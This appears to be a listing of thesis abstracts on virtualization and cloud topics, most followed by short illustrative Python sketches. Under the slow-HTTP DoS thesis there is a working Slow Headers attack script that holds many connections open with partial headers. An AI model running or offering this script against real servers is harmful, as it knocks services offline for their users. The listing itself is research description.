31

Analysis and Detection of Heap-based Malwares Using Introspection in a Virtualized Environment

Javaid, Salman 13 August 2014 (has links)
Malware detection and analysis is a major part of computer security. There is an arms race between security experts and malware developers: one side develops techniques to secure computer systems while the other finds ways to circumvent them. In recent years, process heap-based attacks have increased significantly. These attacks exploit the target system via the heap, typically through heap spraying. The main drawback of existing countermeasures is that they either consume too many resources or are complicated to implement. Our work in this thesis focuses on new methods that offload process heap analysis for guest Virtual Machines (VMs) to the privileged domain using Virtual Machine Introspection (VMI) in a cloud environment. VMI provides a seamless, non-intrusive way of observing the memory and state of VMs that is invisible to the malware and does not raise red flags.
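The abstract does not give implementation details, but the heap-spray pattern it refers to can be illustrated with a minimal sketch: scan a dump of a process heap for long runs dominated by a single repeated byte, a common signature of sprayed filler. The function name, the 4 KiB window size, and the thresholds below are illustrative assumptions, not the thesis's actual detection method.

```python
from collections import Counter

def looks_like_heap_spray(heap_dump: bytes, window: int = 4096,
                          repeat_threshold: float = 0.9) -> bool:
    """Heuristic sketch: flag the dump if many windows are dominated by one byte value.

    A sprayed heap tends to contain large regions filled with the same
    NOP-like byte (e.g. 0x90), so we count how many fixed-size windows
    consist almost entirely of a single byte.
    """
    suspicious = 0
    total = 0
    for off in range(0, len(heap_dump) - window + 1, window):
        chunk = heap_dump[off:off + window]
        most_common = Counter(chunk).most_common(1)[0][1]
        total += 1
        if most_common / window >= repeat_threshold:
            suspicious += 1
    # Flag if more than a quarter of the heap looks like spray filler.
    return total > 0 and suspicious / total > 0.25

# Example: a synthetic "sprayed" heap made of 0x90 filler plus shellcode-like noise.
fake_heap = b"\x90" * 1_000_000 + bytes(range(256)) * 100
print(looks_like_heap_spray(fake_heap))  # True
```

In a VMI setting, the `heap_dump` bytes would be read from the guest's memory by the privileged domain rather than from inside the guest itself; how that read is performed is outside this sketch.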
32

An Investigation of the Impact of the Slow HTTP DOS and DDOS attacks on the Cloud environment

Helalat, Seyed Milad January 2017 (has links)
Cloud computing has brought many benefits to the IT industry; it can reduce costs and facilitate the growth of businesses, especially startup companies that do not have the financial resources to build their own IT infrastructure. One of the main reasons companies hesitate to use cloud services is the security issues inherent in cloud computing technology. This thesis first gives an overview of the cloud computing concept, reviews cloud security vulnerabilities according to the Cloud Security Alliance, and describes cloud denial-of-service attacks. It then focuses on the Slow HTTP DoS attack and analyzes the direct and indirect impact of these attacks on virtual machines. We chose to analyze slow-rate HTTP attacks because of their stealthy, covert nature and the catastrophic impact they can have, whether launched against a cloud component or from within the cloud. There is existing research on ways to protect a web server or web service against slow HTTP attacks, but there is a gap concerning the impact of such attacks on virtualized environments and whether they have cross-VM effects. This thesis investigates the impact of the Slow HTTP attack on a virtualized environment and analyzes its direct and indirect effects. To generate the attacks, the Slow Headers, Slow Body, and Slow Read variants are implemented using the Slowhttptest and OWASP Switchblade tools, and Wireshark is used to capture the traffic. To measure the impact, the attacks are launched against VirtualBox, and the effect on both the victim VM and a neighboring VM is measured.
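To make the mechanism concrete (this is not the thesis's test harness), the Slow Headers variant can be sketched in a few lines of Python: open many connections and trickle header bytes just often enough to keep the server's connection slots occupied. The host, port, and timing values are placeholders and assume a lab server you control.

```python
import socket
import time

# Illustrative sketch of the Slow Headers principle, for a lab server you own.
TARGET_HOST = "127.0.0.1"    # placeholder: a test server under your control
TARGET_PORT = 8080
CONNECTIONS = 50
KEEPALIVE_INTERVAL = 10      # seconds between partial header fragments

def open_slow_connection() -> socket.socket:
    s = socket.create_connection((TARGET_HOST, TARGET_PORT), timeout=5)
    # Send a request line but never terminate the header block with "\r\n\r\n".
    s.sendall(b"GET / HTTP/1.1\r\nHost: " + TARGET_HOST.encode() + b"\r\n")
    return s

sockets = [open_slow_connection() for _ in range(CONNECTIONS)]
for _ in range(3):           # a few keep-alive rounds for demonstration
    time.sleep(KEEPALIVE_INTERVAL)
    for s in sockets:
        # Each bogus header fragment resets the server's header-read timeout.
        s.sendall(b"X-a: b\r\n")
for s in sockets:
    s.close()
```

The Slow Body and Slow Read variants follow the same idea, stalling the request body or the response read instead of the headers.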
33

Memory Dispatcher: a contribution to resource management in virtual environments

Baruchi, Artur 26 March 2010 (has links)
Virtual machines have gained great importance with the advent of multi-core processors (on the x86 platform) and the falling cost of hardware components such as memory. This substantial increase in computational power created the challenge of taking advantage of the idle resources found in corporate environments, which are increasingly populated by multi-core machines with several gigabytes of memory. Virtualization, although an old concept, became popular again in this scenario because it allows these now-abundant computational resources to be used more effectively. The main focus of this work is to study some of the principal techniques for managing computational resources in virtualized environments. Although many of the concepts applied in the design of Virtual Machine Monitors were ported from conventional operating systems with little or no change, some resources are still difficult to virtualize efficiently because of paradigms inherited from those same operating systems. Finally, the Memory Dispatcher (MD) is presented, a memory management mechanism whose main objective is to distribute memory among virtual machines more effectively. The mechanism, implemented in C, was tested on the Xen Virtual Machine Monitor and showed memory gains of up to 70%.
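The abstract does not describe the MD algorithm itself, but the general idea of redistributing memory among Xen guests can be sketched as a rebalancing loop: estimate each VM's demand and set its balloon target proportionally. The demand figures and the use of `xl mem-set` as the actuation step are assumptions for illustration, not the thesis's implementation.

```python
import subprocess

def rebalance(demands_mib: dict[str, int], pool_mib: int, floor_mib: int = 256) -> dict[str, int]:
    """Split a host memory pool among VMs proportionally to their estimated demand.

    demands_mib: estimated working-set size per domain (how it is measured is
    outside this sketch); pool_mib: memory available for guests; floor_mib:
    minimum allocation so no guest is starved.
    """
    total_demand = sum(demands_mib.values()) or 1
    targets = {}
    for dom, demand in demands_mib.items():
        share = int(pool_mib * demand / total_demand)
        targets[dom] = max(floor_mib, share)
    return targets

def apply_targets(targets: dict[str, int]) -> None:
    # Actuation through the Xen toolstack's balloon driver, run from the privileged domain.
    for dom, mib in targets.items():
        subprocess.run(["xl", "mem-set", dom, f"{mib}m"], check=False)

# Example: three guests with unequal demand sharing an 8 GiB pool.
print(rebalance({"web": 3000, "db": 6000, "batch": 1000}, pool_mib=8192))
```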
34

Integrating the Lua Language and the Common Language Runtime

FABIO MASCARENHAS DE QUEIROZ 27 May 2004 (has links)
The Common Language Runtime (CLR) is a platform that aims to make interoperability among different programming languages easier by using a common intermediate language (the Common Intermediate Language, or CIL) and a common type system (the Common Type System, or CTS). Lua is a flexible scripting language with a simple syntax; scripting languages are frequently used to glue together components written in other languages, to build application prototypes, and in configuration files. This work presents two approaches for integrating the Lua language with the CLR, with the objective of allowing Lua scripts to instantiate and use components written for the CLR. The first approach is to create a bridge between the Lua interpreter and the CLR without changing the interpreter. The features and implementation of this bridge are shown, and it is compared with other work following the same approach. The second approach is to compile the virtual-machine instructions of the Lua interpreter to instructions of the CLR's Common Intermediate Language, without introducing changes to the Lua language. The implementation of a Lua-instructions-to-CIL compiler is shown, and the performance of scripts it compiles is compared with the performance of the same scripts run by the Lua interpreter and with equivalent scripts compiled by other scripting-language compilers for the CLR.
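The first approach above, a reflection-based bridge that lets a scripting language instantiate CLR components, has a close analogue in Python that gives a feel for what such a bridge exposes to scripts. This sketch uses the pythonnet package as an assumed stand-in, not anything from the thesis's Lua bridge; it presumes `pip install pythonnet` and an available .NET runtime.

```python
# Rough Python analogue of the "bridge" integration strategy: the CLR is loaded
# into the process and its types become callable from the scripting language.
import clr                      # provided by pythonnet; loads the CLR

clr.AddReference("System")      # make the System assembly visible to the script

from System import DateTime, Environment

# CLR objects are instantiated and used directly from the scripting language;
# the bridge converts between script values and CTS types at the boundary.
now = DateTime.Now
print("CLR says it is", now.ToString())
print("Running on", Environment.OSVersion.ToString())
```

The second approach, compiling the interpreter's virtual-machine instructions to CIL, avoids this per-call conversion cost by turning scripts into CLR code ahead of execution.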
35

Applications of information sharing for code generation in process virtual machines

Kyle, Stephen Christopher January 2016 (has links)
As the backbone of many computing environments today, it is important that process virtual machines be both performant and robust in mobile, personal desktop, and enterprise applications. This thesis focusses on code generation within these virtual machines, particularly addressing situations where redundant work is being performed. The goal is to exploit information sharing in order to improve the performance and robustness of virtual machines that are accelerated by native code generation. First, the thesis investigates the potential to share generated code between multiple threads in a dynamic binary translator used to perform instruction set simulation. This is done through a code generation design that allows native code to be executed by any simulated core, and by adding a mechanism to share native code regions between threads. This is shown to improve the average performance of multi-threaded benchmarks by 1.4x when simulating 128 cores on a quad-core host machine. Secondly, the ahead-of-time code generation system used for executing Android applications is improved through the use of profiling. The thesis investigates the potential for profiles produced by individual users of applications to be shared and merged together to produce a generic profile that still provides substantial benefit for a new user, who is then able to skip the expensive profiling phase. These profiles can not only be used for selective compilation to reduce code size and installation time, but can also be used for focussed optimisation of vital code regions of an application in order to improve overall performance. With selective compilation applied to a set of popular Android applications, code size can be reduced by 49.9% on average, while installation time can be reduced by 31.8%, with only an average 8.5% increase in the amount of sequential runtime required to execute the collected profiles. The thesis also shows that, among the tested users, the use of a crowd-sourced and merged profile does not significantly affect their estimated performance loss from selective compilation (0.90x-0.92x) in comparison to when they perform selective compilation with their own unique profile (0.93x). Furthermore, by proposing a new, more powerful code generator for Android's virtual machine, these same profiles can be used to perform focussed optimisation, which preliminary results show to increase runtime performance across a set of common Android benchmarks by 1.46x-10.83x. Finally, in such a situation where a new code generator is being added to a virtual machine, it is also important to test the code generator for correctness and robustness. The methods of execution of a virtual machine, such as interpreters and code generators, must share a set of semantics about how programs must be executed, and this can be exploited in order to improve testing. This is done through the application of domain-aware binary fuzzing and differential testing within Android's virtual machine. The thesis highlights a series of actual code generation and verification bugs that were found in Android's virtual machine using this testing methodology, as well as comparing the proposed approach to other state-of-the-art fuzzing techniques.
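One idea in this abstract, merging per-user profiles into a crowd-sourced profile and then compiling only the methods that profile marks hot, can be sketched as follows. The profile format (method name to invocation count) and the threshold are illustrative assumptions, not the thesis's actual profile representation.

```python
from collections import Counter

def merge_profiles(user_profiles: list[dict[str, int]]) -> Counter:
    """Sum per-user invocation counts into one crowd-sourced profile."""
    merged = Counter()
    for profile in user_profiles:
        merged.update(profile)
    return merged

def select_for_compilation(merged: Counter, min_hits: int = 100) -> set[str]:
    """Selective compilation: only methods hot in the merged profile are compiled
    ahead of time; everything else stays on the slower path, shrinking code size
    and installation time."""
    return {method for method, hits in merged.items() if hits >= min_hits}

# Example with three hypothetical users of the same app.
profiles = [
    {"MainActivity.onCreate": 40, "ImageLoader.decode": 900, "Settings.open": 2},
    {"MainActivity.onCreate": 55, "ImageLoader.decode": 700},
    {"MainActivity.onCreate": 60, "Feed.render": 300},
]
merged = merge_profiles(profiles)
# Set order may vary: {'ImageLoader.decode', 'MainActivity.onCreate', 'Feed.render'}
print(select_for_compilation(merged))
```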
37

HW/SW mechanisms for instruction fusion, issue and commit in modern µ-processors

Deb, Abhishek 03 May 2012 (has links)
In this thesis we have explored the co-designed paradigm to show alternative processor design points. Specifically, we have provided HW/SW mechanisms for instruction fusion, issue and commit for modern processors. We have implemented a co-designed virtual machine monitor that binary-translates x86 instructions into RISC-like micro-ops. The translations are stored as superblocks, which are traces of basic blocks, and are further optimized using speculative and non-speculative optimizations; hardware mechanisms exist to take corrective action in case of misspeculation. During the course of this PhD we have made the following contributions. Firstly, we have provided a novel Programmable Functional Unit (PFU) to speed up general-purpose applications. The PFU consists of a grid of functional units, similar to the CCA, and a distributed internal register file. The inputs of a macro-op are brought from the physical register file to the internal register file using a set of moves and a set of loads. A macro-op fusion algorithm fuses micro-ops at runtime; it is based on a scheduling step that indicates whether the current fused instruction is beneficial or not. The micro-ops corresponding to a macro-op are stored as control signals in a configuration, and the macro-op carries a configuration ID that helps locate its configuration. A small configuration cache inside the PFU holds these configurations; on a miss, configurations are loaded from the I-cache. Moreover, to support bulk commit of atomic superblocks that are larger than the ROB, we have proposed a speculative commit mechanism based on a speculative commit register map table that holds the mappings of speculatively committed instructions. When all the instructions of the superblock have committed, the speculative state is copied to the backend register rename table. Secondly, we proposed a co-designed in-order processor with two kinds of FU-based accelerators, each running a pair of fused instructions. We have considered two kinds of instruction fusion: first, we fuse a pair of independent loads into a vector load and execute it on a vector load unit; second, we fuse a pair of dependent simple ALU instructions and execute them in an Interlock Collapsing ALU (ICALU). Moreover, we have evaluated the performance of various code optimizations such as list scheduling, load-store telescoping and load hoisting, among others, and have compared our co-designed processor with small-instruction-window out-of-order processors. Thirdly, we have proposed a co-designed out-of-order processor in which we reduce complexity in two areas. First, we have co-designed the commit mechanism to enable bulk commit of atomic superblocks. In this solution we replace the conventional ROB with the Superblock Ordering Buffer (SOB), which ensures program order is maintained at the granularity of the superblock by bulk-committing the program state. The program state consists of the register state, held in a per-superblock register map table, and the memory state, held in a gated store buffer and updated in bulk. Furthermore, we have tackled the complexity of the out-of-order issue logic by using FIFOs: we propose an enhanced steering heuristic that fixes the inefficiencies of the existing dependence-based heuristic, along with a mechanism to release FIFO entries earlier that further improves the performance of the steering heuristic.
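The second kind of fusion described above, pairing a simple ALU micro-op with a dependent one so the pair can execute in an interlock-collapsing ALU, can be illustrated with a toy fusion pass over a micro-op list. The micro-op representation and the greedy single-use pairing rule are simplified assumptions for illustration, not the thesis's fusion algorithm.

```python
from dataclasses import dataclass

@dataclass
class MicroOp:
    op: str                  # e.g. "add", "sub", "and"
    dst: str
    srcs: tuple[str, ...]

SIMPLE_ALU = {"add", "sub", "and", "or", "xor"}

def fuse_dependent_alu_pairs(uops: list[MicroOp]) -> list[object]:
    """Greedy toy pass: fuse an ALU micro-op with an immediately following
    ALU micro-op that consumes its result (single use assumed)."""
    fused, i = [], 0
    while i < len(uops):
        a = uops[i]
        if (i + 1 < len(uops)
                and a.op in SIMPLE_ALU
                and uops[i + 1].op in SIMPLE_ALU
                and a.dst in uops[i + 1].srcs):
            # One issue slot for the pair; the dependence is collapsed inside the ICALU.
            fused.append(("FUSED_ICALU", a, uops[i + 1]))
            i += 2
        else:
            fused.append(a)
            i += 1
    return fused

trace = [MicroOp("add", "r1", ("r2", "r3")),
         MicroOp("sub", "r4", ("r1", "r5")),   # depends on r1 -> fused with the add
         MicroOp("xor", "r6", ("r7", "r8"))]
for item in fuse_dependent_alu_pairs(trace):
    print(item)
```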
38

Algorithms for efficient VM placement in data centers : Cloud Based Design and Performance Analysis

Atchukatla, Mahammad suhail January 2018 (has links)
Context: Recent trends show that cloud computing adoption is continuously increasing in every organization, so demand for cloud datacenters has grown tremendously over time, resulting in significantly higher resource utilization. In this thesis, research was carried out on optimizing energy consumption by packing virtual machines in the datacenter. The CloudSim simulator was used for evaluating bin-packing algorithms, and the OpenStack cloud computing environment was chosen as the platform for the practical implementation. Objectives: The objectives of this research are to (1) simulate the algorithms in the CloudSim simulator, (2) estimate and compare the energy consumption of different packing algorithms, and (3) design an OpenStack testbed to implement a bin-packing algorithm. Methods: We use the CloudSim simulator to estimate the energy consumption of the First Fit, First Fit Decreasing, Best Fit, and Enhanced Best Fit algorithms, and design a heuristic model for implementation in the OpenStack environment to optimize the energy consumption of the physical machines. Server consolidation and live migration are used in the algorithm design for the OpenStack implementation. The research also extends to the Nova scheduler functionality in an OpenStack environment. Results: In most cases the Enhanced Best Fit algorithm gives the better results. Results were obtained from the default OpenStack VM placement algorithm as well as from the heuristic algorithm developed in this work, and their comparison indicates that the total energy consumption of the data center is reduced without affecting potential service level agreements. Conclusions: The research shows that the energy consumption of the physical machines can be optimized without compromising the offered service quality. A Python wrapper was developed to implement this model in the OpenStack environment and to minimize the energy consumption of the physical machines by shutting down the unused ones. The results also indicate that CPU utilization does not vary much when live migration of a virtual machine is performed.
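The bin-packing heuristics compared in this abstract can be sketched in a few lines by treating hosts as bins with a RAM capacity and VMs as items. The capacities, demands, and the RAM-only packing criterion are simplifying assumptions, not the thesis's full energy model.

```python
def first_fit_decreasing(vm_ram: list[int], host_capacity: int) -> list[list[int]]:
    """Place each VM (largest first) on the first host with enough free RAM,
    opening a new host when none fits; fewer powered-on hosts means less energy."""
    hosts: list[list[int]] = []
    free: list[int] = []
    for ram in sorted(vm_ram, reverse=True):
        for i, f in enumerate(free):
            if ram <= f:
                hosts[i].append(ram)
                free[i] -= ram
                break
        else:
            hosts.append([ram])
            free.append(host_capacity - ram)
    return hosts

def best_fit(vm_ram: list[int], host_capacity: int) -> list[list[int]]:
    """Place each VM on the host that will have the least free RAM left over."""
    hosts: list[list[int]] = []
    free: list[int] = []
    for ram in vm_ram:
        candidates = [(f - ram, i) for i, f in enumerate(free) if f >= ram]
        if candidates:
            _, i = min(candidates)
            hosts[i].append(ram)
            free[i] -= ram
        else:
            hosts.append([ram])
            free.append(host_capacity - ram)
    return hosts

vms = [6, 2, 5, 7, 3, 1, 4]          # VM RAM demands in GB (illustrative)
print(first_fit_decreasing(vms, 8))  # [[7, 1], [6, 2], [5, 3], [4]]
print(best_fit(vms, 8))
```

In the OpenStack setting described above, the packing result would drive consolidation via live migration, after which hosts left empty can be powered down.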
39

Proposal of a strategy for monitoring and management of virtual networks based on the open standard OpenFlow

Damalio, Douglas Brito 31 January 2011 (has links)
This work presents a proposal for managing and monitoring virtual networks by adapting Nagios, a management and monitoring tool widely used in datacenters by network administrators. The adaptation was implemented by creating a plug-in that collects relevant data from virtual switches and infers the availability state of those switches. To verify the usability of the plug-in, a virtual network was built using the open standard OpenFlow and Open vSwitch together with the NOX controller, in addition to virtual machines created on the KVM hypervisor with the help of the libvirt library for creating the virtual machines and virtual interfaces.
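A Nagios plug-in is simply a program that prints one status line and exits with a conventional code (0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN); a minimal virtual-switch check in that style is sketched below. The use of `ovs-vsctl show` as the probe and the bridge name are assumptions for illustration, not the plug-in described in the thesis.

```python
#!/usr/bin/env python3
"""Minimal Nagios-style availability check for a virtual switch (illustrative sketch)."""
import subprocess
import sys

OK, WARNING, CRITICAL, UNKNOWN = 0, 1, 2, 3
BRIDGE = "br0"   # assumed bridge name

def check_bridge(bridge: str) -> int:
    try:
        out = subprocess.run(["ovs-vsctl", "show"], capture_output=True,
                             text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired) as exc:
        print(f"UNKNOWN - could not query Open vSwitch: {exc}")
        return UNKNOWN
    if out.returncode != 0:
        print(f"CRITICAL - ovs-vsctl failed: {out.stderr.strip()}")
        return CRITICAL
    # Older OVS versions quote the bridge name in the output, so accept both forms.
    if f"Bridge {bridge}" in out.stdout or f'Bridge "{bridge}"' in out.stdout:
        print(f"OK - bridge {bridge} is present")
        return OK
    print(f"CRITICAL - bridge {bridge} not found in OVS configuration")
    return CRITICAL

if __name__ == "__main__":
    sys.exit(check_bridge(BRIDGE))
```

Nagios interprets the exit code to set the service state, which is how the plug-in's availability inference reaches the administrator's dashboard.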
40

Indirect branch emulation techniques in virtual machines

Gomes, Gabriel Ferreira Teles, 1985- 07 July 2014 (has links)
Advisor: Edson Borin. Master's dissertation, Universidade Estadual de Campinas, Instituto de Computação. Abstract: Dynamic binary translation is an emulation technique commonly employed in the implementation of virtual machines. One of the main sources of overhead that hinders the applicability of dynamic binary translators is the emulation of indirect branch instructions. This master's thesis describes several techniques that try to improve the performance and efficiency of indirect branch emulation in efficient virtual machines. DynamoRIO is one such machine, and it implements features used by several of those techniques. In this thesis, we present the current implementation of DynamoRIO, modify its code to include two new indirect branch emulation techniques (Inline Caching and IBTC), and compare them with other techniques described in the literature.
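The IBTC technique named in this abstract boils down to a runtime map from guest branch-target addresses to already-translated code addresses, consulted before falling back to the translator's slow lookup path. The sketch below models that lookup with a plain dictionary; the address values and the translator callback are illustrative assumptions.

```python
# Toy model of an Indirect Branch Translation Cache (IBTC): on an indirect branch,
# look the guest target up in a cache of guest->translated addresses; only on a miss
# do we pay the cost of the full translator lookup, then memoize the result.
class IBTC:
    def __init__(self, translate_slow):
        self.cache: dict[int, int] = {}
        self.translate_slow = translate_slow   # fallback, e.g. the translator's hash table
        self.hits = 0
        self.misses = 0

    def lookup(self, guest_target: int) -> int:
        code = self.cache.get(guest_target)
        if code is not None:
            self.hits += 1
            return code
        self.misses += 1
        code = self.translate_slow(guest_target)  # translate (or locate) the target block
        self.cache[guest_target] = code
        return code

# Illustrative "translator": pretend translated code lives at guest address + 0x1000.
ibtc = IBTC(lambda addr: addr + 0x1000)
targets = [0x400000, 0x400040, 0x400000, 0x400000, 0x400040]
for t in targets:
    ibtc.lookup(t)
print(f"hits={ibtc.hits} misses={ibtc.misses}")   # hits=3 misses=2
```

Inline caching, the other technique mentioned, instead specializes the translated branch site itself for its most recent target, avoiding even this shared-table lookup when the prediction holds.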
